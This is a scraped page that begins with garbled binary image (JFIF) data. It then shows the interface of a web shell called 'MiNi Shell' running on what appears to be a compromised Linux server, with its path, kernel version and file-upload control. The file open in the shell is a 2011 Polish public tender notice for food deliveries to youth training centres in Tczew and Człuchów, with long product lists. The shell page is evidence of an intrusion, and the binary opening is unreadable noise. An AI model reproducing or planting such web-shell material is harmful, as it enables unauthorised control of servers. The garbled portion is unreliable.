JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20111219/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20111219/335725-N-2011.html

<p class="kh_header"><b>Gdańsk: Bezgotówkowa dostawa artykułów żywnościowych dla OSiW w Tczewie, 
ROSZM w Tczewie,  w 2012 r.</b><br>
<b>Numer ogłoszenia: 335725 - 2011; data zamieszczenia: 19.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ochotnicze Hufce Pracy - Pomorska Wojewódzka Komenda , ul. J. Uphagena 27, 80-237 Gdańsk, woj. pomorskie, tel. 58 3017916, faks 58 3017916.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pomorska.ohp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: instytucja rynku pracy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bezgotówkowa dostawa artykułów żywnościowych dla OSiW w Tczewie, 
ROSZM w Tczewie,  w 2012 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1) Przedmiotem zamówienia jest sukcesywna bezgotówkowa dostawa artykułów żywnościowych dla 
- Ośrodka Szkolenia i Wychowania w Tczewie, ul. Sobieskiego 10 - zadanie nr 1,2,3,4,5,6,7,8, 9,10. 
- Rejonowego Ośrodka Szkolenia Zawodowego Młodzieży w Tczewie ul. Sobieskiego 10, zadanie nr 11,12,13,14,15,16,17,18,19,20
- Ośrodka Szkolenia i Wychowania w Człuchowie, ul. Kusocińskiego 4- zadanie nr 21.

od 1 stycznia 2012 r. do dnia 31 grudnia 2012 roku 
      Przedmiot zamówienia podzielono na dwadzieścia jeden zadań częściowych:
OSIW TCZEW
Zadanie nr 1 - owoce świeże 
Zadanie nr 2 - owoce przetworzone  
Zadanie nr 3 - warzywa świeże 
Zadanie nr 4 - warzywa przetworzone 
Zadanie nr 5 - mrożonki 
Zadanie nr 6 - ryby i przetwory konserwowe 
Zadanie nr 7 - produkty skrobi - mąka  
Zadanie nr 8 - różne produkty spożywcze 
Zadanie nr 9- oleje i tłuszcze roślinne 
Zadanie nr 10 - napoje   
ROSZM TCZEW
Zadanie nr 11 - owoce świeże 
Zadanie nr 12 - owoce przetworzone  
Zadanie nr 13 - warzywa świeże 
Zadanie nr 14 - warzywa przetworzone 
Zadanie nr 15 - mrożonki 
Zadanie nr 16 - ryby i przetwory konserwowe
Zadanie nr 17- produkty skrobi - mąka  
Zadanie nr 18- różne produkty spożywcze 
Zadanie nr 19 - produkty mleczarskie
Zadanie nr 20 - napoje  
Zadanie nr 21 - produkty przemiału ziarna i skrobi - pieczywo  CZŁUCHÓW
2) Dostawa będzie realizowana cyklicznie transportem Wykonawcy i na jego koszt do:
- Ośrodka Szkolenia i Wychowania w Tczewie , ul. Sobieskiego 10 (dokładne miejsce na terenie OSiW Tczew wskazane będzie przez Zamawiającego po podpisaniu umowy) ZADANIA OD 1 DO 20. 
- Ośrodka Szkolenia i Wychowania w Człuchowie, ul. Kusocińskiego 4 (dokładne miejsce na terenie OSiW Człuchów wskazane będzie przez Zamawiającego po podpisaniu umowy) ZADANIE 21. 

3) Dostawca realizuje dostawy na własny koszt, transportem przystosowanym do tego celu i spełniającym niezbędne wymagania określone przepisami prawa obowiązującymi w tym zakresie. 
4) Każdy z artykułów powinien być dostarczony w wymaganych opakowaniach. Cykliczne dostawy  będą realizowane od poniedziałku do niedzieli w godzinach od  5.00 do   14.00. najpóźniej na drugi dzień od złożenia zapotrzebowania. Każdorazowa dostawa odbywa się na podstawie wcześniejszego zapotrzebowania określającego dokładną godzinę dostarczenia, datę dostarczenia, ilość, rodzaj artykułów, złożonego nawet w dniu poprzedzającym dostawę (pisemnie, faksem lub telefonicznie). 
Cykliczne dostawy  będą realizowane jak następuje:  
5) Zamawiający powiadomi telefonicznie Wykonawcę, o każdej dostawie oraz wskaże zamawiane artykuły z podaniem ilości.
6) Artykuły muszą spełniać normy jakościowe oraz muszą być dostarczone w ich początkowym okresie gwarancji.
7) Wykonawca powinien zachować odpowiednie warunki  transportu i przechowywania dostarczanego towaru. Każda dostawa artykułów wymagającego załączenia handlowego dokumentu identyfikacyjnego musi posiadać taki dokument. 
8) Wykonawca użyczy nieodpłatnie ewentualnie potrzebnych pojemników przy każdorazowej dostawie artykułów do siedziby Zamawiającego na okres do następnej dostawy.
9) Zamawiający zastrzega sobie prawo zamawiania mniejszej ilości towaru niż określona w ofercie.
Wykonawcy nie przysługują wobec Zamawiającego roszczenia odszkodowawcze z tytułu zmniejszenia      zamówienia. Wykonawcy będzie przysługiwało jedynie wynagrodzenie za zrealizowane dostawy bez naliczania kar umownych w razie zmniejszenia ilości dostaw.
10) W trakcie realizacji zamówienia Zamawiający zastrzega sobie możliwość zamiany proporcji ilościowych poszczególnego asortymentu w stosunku do podanego w formularzu ofertowym. 
11) Wykonawca ma obowiązek uznania reklamacji jakości i ilości dostarczanych artykułów i      dostarczenia nowej partii artykułów do siedziby  Zamawiającego  w dniu złożenia reklamacji.
12) Do składania zamówień Zamawiający upoważni wybranego pracownika.
13)	 W przypadku niedostarczenia towaru w wyznaczonym terminie i czasie lub dostarczenia towaru niezgodnie ze złożonym zapotrzebowaniem, Zamawiający zastrzega sobie prawo do zakupu niedostarczonego towaru, a kosztami zakupu (fakturą Vat) obciąży Wykonawcę. Zamawiający powiadomi o tym fakcie Wykonawcę telefonicznie i na piśmie.
14)	Jeżeli w opisie przedmiotu zamówienia znajduje się jakikolwiek znak towarowy, patent czy pochodzenie - należy przyjąć, że Zamawiający podał taki opis ze wskazaniem na typ i dopuszcza składanie rozwiązań równoważnych o parametrach techniczno/eksploatacyjno/użytkowych nie gorszych niż te, podane pod pojęciem typu. 
15)	Wykonawca ma obowiązek wystawiać faktury oddzielne na każde zadanie w ramach zamówienia cząstkowego z zaznaczeniem, które zadani obejmuj faktura.   
arbuz	kg	100
banany	kg	150
brzoskwinie	kg	80
cytryny	kg	30
gruszki	kg	60
jabłka	kg	300
kiwi	kg	11
kiwi	szt	92
nektaryny	kg	50
maliny 500g	szt	8
maliny	kg	8
mandarynki	kg	80
pomarancza	kg	60
śliwki	kg	20
truskawki	kg	30
winogrona	kg	50
ananas konserwowany450g	szt	48
brzoskwinie kons.0.9	szt	30
Dżem 7 kg	szt	10
Dżem  270g	szt	100
kompot wiśniowy 0,9 l	szt	50
sok owocowy 2l (różne smaki-pomarańcz	szt	30
grejfrut, jabłkowy, cz.pożeczka, mixitp)		
sok owocowy 1l (różne smaki-pomarań,	szt	45
gruszka, wiśnia, grejfrut,mix itp.)		
sok typu owocowy, warzywno -owocowe	szt	185
(marchew-trusk-banan, marchew-malina-		
banan, marchew-jabł-banan itp.) 220ml		
syrop owocowy 6,5l	szt	40
syrop owocowy 1l	szt	20
rodzynki suszone 100g	szt	20
burak młody - botwina	szt	50
burak	kg	250
brokuł	szt	35
cebula	kg	350
cebula czerwona 	kg	5
czosnek	szt	25
fasola drobna 5kg	szt	5
fasola jaś	kg	25
fasola szparagowa	kg	15
groch łuska 0,5kg	szt	40
kapusta czerwona	kg	20
kapusta młoda 	szt	50
kapusta 	kg	200
kapusta pekińska	kg	80
kapusta pekińska	szt	40
kalafior	szt	65
koper	szt	100
koper duży	szt	15
marchew młoda	kg	50
marchew myta	kg	400
ogórek świeży	kg	250
papryka świeża	kg	80
pietruszka korzeń	kg	20
pomidor	kg	200
por 	szt	40
por 	kg	100
rzodkiewka pęczki	szt	120
sałata	szt	100
seler	kg	190
szczypiorek	szt	70
zielenina natka	szt	250
ziemniaki młode	kg	400
ziemniaki 	kg	3000
chrzan tarty 160g	szt	15
fasolka czerwona konserw.	szt	10
groszek konserwowy 450g	szt	40
groszek z marchewką 0,9l	szt	20
kapusta kiszona  	kg	180
koncentrat pomidorowy 0,9l - 1l	szt	55
kukurydza konserwowa	szt	40
ogórki kiszone 	kg	100
ogórki małosolne	kg	15
ogórki konserwowe 0,9l	szt	90
papryka konserwowa 0,9l	szt	85
pieczarka	kg	80
pieczarka konserwowa 0,9l	szt	30
brukselka mroż 0.5 kg	szt	20
brokuły mroż. 2,5 kg	szt	8
Frytki 2 kg	szt	20
hamburger mrozony 	szt	180
kalafior mroż	kg	25
marchew kostka mroż	kg	50
mieszanka kompotowa 	kg	15
pizza 500g	szt	90
pyzy z mięsem  	kg	70
pyzy z owocami (knedle)	kg	60
truskawki mrozone	kg	10
warzywa na pat.chinskie	kg	10
zapiekanka 200g	szt	135
zupa wiosenna	kg	25
brukselka mroż 0.5 kg	szt	20
brokuły mroż. 2,5 kg	szt	8
Frytki 2 kg	szt	20
hamburger mrozony 	szt	180
kalafior mroż	kg	25
marchew kostka mroż	kg	50
mieszanka kompotowa 	kg	15
pizza 500g	szt	90
pyzy z mięsem  	kg	70
pyzy z owocami (knedle)	kg	60
truskawki mrozone	kg	10
warzywa na pat.chinskie	kg	10
zapiekanka 200g	szt	135
zupa wiosenna	kg	25
filet z morszczuka	kg	70
matijas	kg	20
makrela wędzona	kg	25
panga	kg	70
paprykarz 156g	szt	60
szprot w pomidorach	szt	50
śledź w pomidorach	szt	50
kasza manna	kg	30
kasza jęczm. Średnia	kg	40
mąka pszenna typu 500	kg	100
mąka pszenna typu 450	kg	70
mąka ziemiaczna	kg	25
płatki kukurydz. 250G	szt	30
platki kukur. 500 g	szt	50
platki kuku.kakaowe 250g	szt	20
platki kukur.kakaowe 500g	szt	50
płatki typu  chocapic	szt	20
ryż w woreczkach 0,5kg	szt	50
ryż 1kg	kg	40
baton   	szt	45
baton czekoladowy nadziewany	szt	135
baton czekoladowy w opakowaniu	szt	90
barszcz czerwony- koncentrat 300ml 	szt	35
bialy barszcz	szt	50
budyń 40g	szt	200
chrupki kukurydziane	szt	46
ciastka w polewie	kg	14
ciastka kruche	kg	14
ciastka typy pierniki	kg	14
ciastka typu wafelki	kg	14
cukier	kg	450
cukier puder  0,5 kg	szt	20
cukier waniliowy	szt	60
cukierki czekoladowe	kg	14
cukierki typu krówki	kg	9
cukierki owocowe	kg	6
cynamon 0,20g	szt	24
czekolada z orzechami	szt	45
czekolada nadziewana	szt	135
czekolada pełnomleczna	szt	180
czipsy 9g	szt	135
drożdże 100g	szt	40
galaretka owocowa	szt	150
herbata expres 100 szt	szt	100
herbata expr. Mietowa 20szt	szt	5
hebata expres owocowa 25szt	szt	10
herbata owoc.rozpusz gran.	szt	15
herbata zielona expre25szt	szt	20
jarzynka 200g	szt	80
kawa rozpuszczalna zboż typu inka	szt	25
kawa rozpuszczalna naturalna	szt	5
kawa naturalna mielona 500g	szt	6
kakao rozpuszczalne 300g	szt	80
keczup 500g 	szt	50
keczup pikantny 0.5 	szt	24
Keczup 1 l	szt	5
kisiel 38g	szt	200
krem czekoladowy 200g	szt	250
krem czekoladowy 400g	szt	60
krem czekoladowo orzechowy 400g	szt	35
krem czekoladowo orzechowy 200g	szt	40
kwasek cytrynowy 20g	szt	100
liść laurowy 12g	szt	40
lizak kulka	szt	45
lizak  serduszko	szt	270
Łazanki 0.5	szt	35
magi w plynie 1 l	szt	37
makaron nitki  0.5 kg	szt	36
makaron gniazda 1kg	szt	20
makaron rurki 1 kg	szt	30
makaron świderki 1kg	szt	50
makaron spagetti 0,5kg	szt	70
majeranek 20g	szt	40
majeranek 150g	szt	8
majonez  400g 	szt	50
majonez   700g  	szt	20
majonez 900g do sałatek	szt	16
mikołaj czekoladowy	szt	46
miód sztuczny 200g	szt	46
miód sztuczny  5kg	szt	2
Miód naturalny 0,9 l	szt	8
musztarda  Sarepska 180g	szt	36
musztrda tuba 0.5 l	szt	14
Ocet 10%	szt	20
paluszki solone 0,400g	szt	24
paluszki z sezamem 70g	szt	135
papryka mielona 20g	szt	60
paprykarz szczeciń 131g	szt	90
paprykarz szczcz. 300G	szt	45
pasztet puszka 160g	szt	96
pasztet 135g z pomidorami	szt	96
pieprz mielony 20g	szt	300
pieprz ziolowy 20g	szt	30
polewa do lodów 1 l	szt	5
polewa do lodów 250g	szt	8
proszek do pieczenia 0,20 g	szt	60
przyprawa gyros 30	szt	40
przyprawa do grilla 20g	szt	15
przyprawa do mięsa 20g  	szt	30
przyprawa do kurczaka 1 kg	szt	2
przyprawa do kurczaka	szt	50
rosól drobiowy 1 kg	szt	5
rosół drobiowy kostki 60g 	szt	30
sos  bolones 0,500l	szt	20
sos do deserów 1 l	szt	10
sos do hamburgerow 1 l	szt	10
sos fix do spagetti 45g	szt	100
sos mix koper-zioł, włoski itp. 9g	szt	100
sos salatkowy mix 700g	szt	8
sos słodko-kwaśny  0,5	szt	48
sos sojowy 1l	szt	4
sól	kg	180
wafelek w polewie	szt	92
wafelek b/polewy typu grzesiek	szt	230
vegeta 200g	szt	80
wiórki kokosowe 0,25	szt	10
zestaw świateczny (np.czelolada, baton, mikołaj)	szt	45
zestaw świąeczny(np. Czekolada, zajączek, baton)	szt	45
ziele angielskie	szt	25
ziele angielskie 600g 	szt	2
zupki  chińska(ostra,łagodna rosołowa itp.)	szt	320
zupki chińska	szt	45
zelatyna 50g	szt	25
żurek w butelce 0,5l	szt	30
zurek w proszku 60g	szt	100
margaryna z masłem 500g	szt	300
Margaryna  do pieczenia 250g	szt	50
masło roślinne 200g	szt	15
oliwa z oliwek 1 l	szt	1
olej 1l	szt	110
olej 3l	szt	20
smalec	kg	3
smalec 200g	szt	50
napoje gazowane 1,5 l	szt	70
napoje niegazowane 1,5 l	szt	70
napój gazowany 2l	szt	14
napój n/g 2 l	szt	14
napój energet	szt	138
Woda mineralna 0,5 gazowana	szt	138
Woda 0,5 n/g 	szt	138
woda mineralna n/g 1,5 l 	szt	92
woda mineralna g 1,5 l 	szt	92
Woda miner n/g 1,5 l 	szt	9
woda gazowana 1,5 l	szt	7
ananas owoc	szt	10
arbuz	kg	50
banany	kg	50
brzoskwinie	kg	30
cytryny	kg	10
gruszki	kg	10
jabłka	kg	50
kiwi	kg	10
nektaryny	kg	25
maliny	kg	3
mandarynki	kg	33
pomarancza	kg	20
pomarańcza siatka	kg	10
rabarbar	kg	17
truskawki	kg	12
winogrona jasne	kg	17
winogrona ciemne	kg	17
wisnie	kg	3
ananas konserowany puszka	szt.	20
brzoskwinia konserwowa puszka	szt	16
Dżem owocowy 7 kg	szt	2
Dżem  słoik	szt	50
kompot truskawkowy 0,9 l	szt	9
marmolada owocowa 7kg	szt	1
sok owocowy 2l karton	szt	17
sok owocowy 1l karton	szt	10
syrop owocowy 6,5l 	szt	7
syrop owocowy 1l 	szt	8
rodzynki suszone 100g	szt	10
rodzynki suszone 0.5 kg	szt	3
śliwki suszone 250g	szt	5
żurawina	szt	5
burak młody	kg	8
burak	kg	50
brokuł	szt	3
cebula	kg	150
cebula młoda	kg	33
cebula czerwona 	kg	3
czosnek	szt	17
fasola jaś 0,5kg	szt	7
fasola drobna 5kg	szt	1
fasola drobna 0,5 kg	szt	3
fasola jaś	kg	3
fasola szparagowa	kg	7
groch cały	kg	3
groch łuska	szt	8
kapusta czerwona	kg	8
kapusta młoda 	szt	17
kapusta 	kg	17
kapusta pekińska	szt	33
kapusta włoska	szt 	7
kalafior	szt	7
koper	szt	50
marchew młoda	kg	10
marchew myta	kg	50
ogórek świeży	kg	40
papryka świeża	kg	13
pietruszka korzeń	kg	40
pomidor	kg	50
por 	kg	40
rzodkiewka pęczki	szt	50
sałata	szt	27
sałata dekoracyjna	szt	33
sałata lodowa	szt	13
seler	kg	27
szczypiorek	szt	27
szparagi	szt	7
zielenina natka	szt	50
ziemniaki młode	kg	67
ziemniaki 	kg	500
chrzan tarty słoik	szt.	7
chrzan z żurawiną	szt	7
cebulka konserwowa 300g	szt	10
fasolka czerwona konserwowa	szt	10
groszek konserwowy 400g	szt	27
groszek z marchewką 0,9l	szt	8
kapusta kiszona  5kg	szt	7
koncentrat pomidorowy 0,9l	szt	10
koncentrat pomidorowy 1l	szt	7
kukurydza konserwowa	szt	10
oliwki zielone 200ml	szt	10
oliwki czarne 	szt	10
ogórki kiszone 3kg	szt	5
ogórki małosolne	kg	20
ogórki konserwowe 0,9l	szt	20
papryka konserwowa 0,9l	szt	15
pieczarka	kg	15
pieczarka konserwowa 0,9l	szt	12
seler w słoiku 0,250	szt	8
szczaw konserwowy 0,9l	szt	8
brukselka mroż. 0,5 kg	szt	3
brukselka mroż. 2,5 kg	szt	5
brokuły mroż. 2,5 kg	szt	5
frytki 450g	szt	12
Frytki 1,5 kg	szt	5
Frytki 2 kg	szt	7
groszek mrozony	kg	5
groszek mrozony 2,5 kg	szt	2
kalafior mroz 2,5 kg	szt	2
kalafior mroż	kg	5
marchew kostka mroż 	kg	5
marchew z groszkiem 2,5 kg	szt	2
marchew z groszkiem mroż	kg	8
pizza 500g	szt	33
szpinak 1kg	szt	10
truskawki mrozone	kg	5
warzywa na patelnię	kg	7
warzywa na pat.chinskie	kg	3
zapiekanka 200g	szt	100
filet z morszczuka	kg	7
karp	kg	2
łosoś filet	kg	5
lłosoś wędzony	kg	7
matijas	kg	3
mintaj wędzony	kg	2
paluszki rybne	kg	10
panga	kg	7
paprykarz 156g	szt	7
pstrąg świe.	kg	3
pstrąg wędzony	kg	7
szprot w pomidorach	szt	13
śledź w pomidorach	szt	13
tuńczyk  w sosie wł. 250G	szt	10
tunczyk w oleju 300g	szt	5
kasza manna 	kg.	3
kasza gryczana 1kg	szt	3
kasza jęczm. Średnia	kg	7
mąka pszenna typu 500	kg	13
mąka pszenna typu 450	kg	13
mąka ziemiaczna	kg	7
platki kukur. 500 g	szt	18
platki kukur.kakaowe 500g	szt	18
ryż 1kg 	szt	7
ryż 1kg	kg	13
baton	szt.	40
baton czekoladowy w opakowaniu	szt	40
baton nadziewany	szt	40
barszcz czerwony 220ml-koncentrat	szt	10
bialy barszcz 60g	szt	7
budyń	szt	17
chrupki kukurydziane	szt	17
ciastka w polewie	kg	3
ciastka kruche	kg	17
ciastka typy pierniki	kg	7
ciastka typu wafelki	kg	17
cukier	kg	170
cukier puder  0,5 kg	szt	3
cukier waniliowy	szt	11
cukierki czekoladowe	kg	20
cukierki krówki	kg	3
cukierki owocowe	kg	13
cynamon 0,20g	szt	7
czekolada pełnomleczna	szt	50
czipsy	szt	50
galaretka owocowa	szt	17
gofry	szt	33
herbata expres 100 szt	szt	43
herbata expres 50 szt	szt	7
hebata expres owocowa 25szt	szt	15
herbata 100szt  lub równoważna	szt	4
jarzynka 200g	szt	8
kawa rozpuszczalna zboż	szt	7
kawa rozpuszczalna 200g  lub równoważna	szt	12
kawa naturalna mielona 500ml	szt	97
kawa  500g  lub równoważna	szt	3
kakao  rozpuszczalne 500g	szt	13
keczup 500g 	szt	10
keczup pikantny 0.5 	szt	5
kisiel	szt	20
kminek 20g	szt	3
krem czekoladowy 200g	szt	50
krem czekoladowy 400g	szt	13
kwasek cytrynowy	szt	27
liść laurowy 12g	szt	5
lizak serduszko	szt	100
magi w plynie 1 l	szt	3
makaron nitki  0.5 kg	szt	13
makaron gniazda 1kg 	szt	13
makaron paczka  1kg	szt	7
makaron świderki 1kg	szt	7
makaron spagetti 0,5kg	szt	17
majeranek 20g	szt	7
majonez  sałatkowy 700g	szt	13
majonez sałatkowy 900g	szt	15
musztarda 	szt	10
musztrda tuba 0.5 l	szt	3
Ocet 10%	szt	7
paluszki solone 0,400g	szt	150
paluszki z sezamem	szt	160
papryka mielona 20g	szt	10
papryka mielona słodka1kg	szt	3
pasztet wielkopolski 131g lub równoważny	szt	13
pasztet wielk.z pomid. 131G  lub równoważny	szt	13
pieprz mielony 20g	szt	10
pieprz ziolowy 20g	szt	3
polewa do lodów 1 l	szt	5
polewa do lodów 250g	szt	10
proszek do pieczenia	szt	13
przyprawa gyros 30	szt	7
przyprawa do kurczaka 1 kg	szt	3
przyprawa do kurczaka	szt	3
rosół drobiowy kost.	szt	17
sos typy bolones 0,500l	szt	10
sos do deserów 1 l	szt	3
sos do spagetti	szt	13
sos neapoli 1kg	szt	3
sos słodko-kwaśny	szt	20
sól	kg	33
wafelek duży(wafel z kremem)	szt	170
wafelek w polewie	szt	150
wafelek grześ w polewie	opk	102
wafelek b/polewy 	szt	50
vegeta 200g	szt	10
ziele angielskie	szt	5
zupki chińska (ostra,łagodna rosołowa itp.)	szt	67
zupki chiska(rosołowa-ostra/lagodna,krabowa itp.)	szt	33
zelatyna 50g	szt	3
żurek w butelce	szt	10
zurek w proszku	szt	8
desrer monte lub równoważny	szt.	50
jogurt pitny	szt	50
jogurt  150g	szt	50
jogurt  150g	szt	50
lody 100g	szt	29
Lody-rolada 850g	szt	20
lody 1000g	szt	21
masło śmietank. 200G	szt	100
Mleko 2% 1l	szt	20
Mleko 3,2% 1l	szt	400
ser feta	szt	7
serek grani	szt	67
serek grani ze szczypiorem	szt	67
serek homogenizowany	szt	60
serek homogenizowany owoc.	szt	60
serek kanapk. Twarożk. 150g	szt	50
serek twaroż.  almette  lub równoważny	szt	50
ser twarogowy 200g	szt	15
ser twarogowy półtusty	kg	5
set topiony 200g	szt	30
ser top. krążek  	szt	45
ser topiony zegar 80g	szt	30
ser salami	kg	8
ser wędzony	kg	5
ser żółty  edamski	kg	5
ser żółty  królewski	kg	6
ser żółty  morski	kg	5
ser żółty  szwajcar	kg	17
śmietana w spray 0,5	szt	7
Śmietana 18% 0,5 l	szt	12
Śmietana 30%  0,5 l	szt	7
napoje gazowane 1,5l	szt.	50
napoje niegazowane 1,5 l	szt	50
napój gazowany 2l	szt	17
napój n/g 2 l	szt	17
Woda mineral. 0,5 gaz	szt	100
Woda mineralna 0,5 n/g	szt	100
Woda mineralna n/g 0,5 l 	szt	100
woda mineral. G 0,,5 l 	szt	100
woda mineral. n/g 1,5 l	szt	350
Woda mineralna g 1,5 l 	szt	350
chleb krojony0,6kg	szt	1300
chleb forma 0.5	szt	50
chleb forma 1kg	szt	17
chleb słonecznikowy 0,5 	szt	17
chleb sojowy 0.5	szt	17
chleb razowy 0,5	szt	20
chleb wiejski 1kg	szt	5
ciastka drożdżowe 100g	szt	133
ciasta różne	kg	8
bułki 100g	szt	133
bułki 50g	szt	1733
bułki hamburger	szt	60
rogal 100g	szt	120
bułka tarta	kg	13
bułka tarta 0,5kg	szt	7
pączki 100g	szt	90
ciastka francuskie	szt	60.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.30.00.00-1, 15.33.11.70-9, 15.80.00.00-6, 15.20.00.00-0, 15.22.00.00-6, 03.21.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 21.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający odstępuje od żądania wadium w niniejszym postępowaniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
